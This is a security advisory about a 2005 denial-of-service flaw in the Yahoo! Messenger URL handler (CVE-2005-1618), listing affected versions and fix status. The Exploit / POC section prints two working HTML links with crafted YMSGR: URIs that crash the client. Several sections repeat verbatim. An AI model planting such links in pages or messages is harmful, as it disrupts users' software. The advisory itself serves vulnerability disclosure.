Yahoo! Messenger URL Handler Remote Denial Of Service Vulnerability
BID:13626
Info
Yahoo! Messenger URL Handler Remote Denial Of Service Vulnerability
| Bugtraq ID: | 13626 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2005-1618 |
| Remote: | Yes |
| Local: | No |
| Published: | May 13 2005 12:00AM |
| Updated: | Feb 20 2007 08:27PM |
| Credit: | Torseq Tech. <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
Yahoo! Messenger 6.0 .0.1921 Yahoo! Messenger 6.0 .0.1750 Yahoo! Messenger 6.0 .0.1643 Yahoo! Messenger 6.0 Yahoo! Messenger 5.6 .0.1358 Yahoo! Messenger 5.6 .0.1356 Yahoo! Messenger 5.6 .0.1355 Yahoo! Messenger 5.6 .0.1351 Yahoo! Messenger 5.6 .0.1347 Yahoo! Messenger 5.6 Yahoo! Messenger 5.5 .1249 Yahoo! Messenger 5.5 Yahoo! Messenger 5.0 .1232 Yahoo! Messenger 5.0 .1065 Yahoo! Messenger 5.0 .1046 Yahoo! Messenger 5.0 |
| Not Vulnerable: |
Yahoo! Messenger 8.1.0.239 Yahoo! Messenger 8.1.0.209 |
Discussion
Yahoo! Messenger URL Handler Remote Denial Of Service Vulnerability
Yahoo! Messenger is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.
A remote user can cause Yahoo! Messenger to disconnect through malicious emails or web pages.
This issue is reported to affect Yahoo! Messenger versions 5.x to 6.0 Windows; other versions on other operating systems may also be affected.
Yahoo! Messenger is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.
A remote user can cause Yahoo! Messenger to disconnect through malicious emails or web pages.
This issue is reported to affect Yahoo! Messenger versions 5.x to 6.0 Windows; other versions on other operating systems may also be affected.
Exploit / POC
Yahoo! Messenger URL Handler Remote Denial Of Service Vulnerability
No exploit is required.
The following proofs of concept are available:
<a href="YMSGR:%63%68%61%74%3F:::%26%26%26%26">Click Here</a>
<a href="YMSGR:Chat?:::%26%26%26%26">Click Here</a>
No exploit is required.
The following proofs of concept are available:
<a href="YMSGR:%63%68%61%74%3F:::%26%26%26%26">Click Here</a>
<a href="YMSGR:Chat?:::%26%26%26%26">Click Here</a>
Solution / Fix
Yahoo! Messenger URL Handler Remote Denial Of Service Vulnerability
Solution:
frisky chris <[email protected]> states that this issue does not affect version 8.1 of Yahoo! Messenger. Symantec has not confirmed this.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
frisky chris <[email protected]> states that this issue does not affect version 8.1 of Yahoo! Messenger. Symantec has not confirmed this.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Yahoo! Messenger URL Handler Remote Denial Of Service Vulnerability
References:
References:
- Yahoo! Messenger Homepage (Yahoo!)
- Yahoo! Messenger URL Handler Remote DoS Vulnerability (Torseq Tech.
)